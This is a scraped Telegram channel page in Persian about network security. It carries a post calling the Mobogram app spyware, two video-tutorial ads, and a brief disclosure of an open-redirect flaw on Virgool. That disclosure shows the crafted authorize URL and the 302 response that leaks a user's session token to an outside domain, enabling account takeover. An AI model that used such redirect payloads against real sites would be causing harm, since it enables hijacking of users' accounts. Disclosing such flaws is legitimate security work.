Network Security Channel
2.57K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
متاسفانه #موبوگرام به صورت کامل غیر فعال شده و راهی جز پاک کردن این اپلیکیشن #جاسوس نیست...
@Engineer_Computer
Media is too big
VIEW IN TELEGRAM
چطور می‌تونستم حساب ویرگول هرکی رو هک کنم؟
یاشار شاهین‌زاده از اعضای آفسک

مهاجم با یک آسیب‌پذیری Open Redirection که در این قسمت وجود داره:

https://virgool.io/authorize?redirectedFrom=https://offsec.ir&status=login

به وبسایتی که از آن بوده برمی‌گرده و در جواب این درخواست توکن شخصی که در ویرگول لاگین بوده برمی‌گرده. با در اختیار داشتن این توکن در مقدار بازگشتی، مهاجم قادر خواهد بود آنرا جایگزین توکن خود کرده و اکانت ویرگول قربانی را تصاحب کند:

HTTP/1.1 302 Found
Server: nginx/1.15.9
...
Cache-Control: no-cache, private
Location: https://offsec.ir/authorize-token?token=sb5uevdkih3r&redirectedFrom=https://offsec.ir/&nightmode={"value":0,"userMenu":0,"active":0}
...
@Engineer_Computer
👍1
Media is too big
VIEW IN TELEGRAM
🎗تک فیلم آموزش پروژه محور
👨‍💻پیاده سازی Theme Customization
👈 0 تا 100
📍با sass & bootstrap
#bootstrap
@Engineer_Computer
Media is too big
VIEW IN TELEGRAM
🎗تک فیلم آموزش پروژه محور
👨‍💻پیاده سازی Monzo Card Selection App
👈 0 تا 100
📍با reactnative & javascript
#reactnative
@Engineer_Computer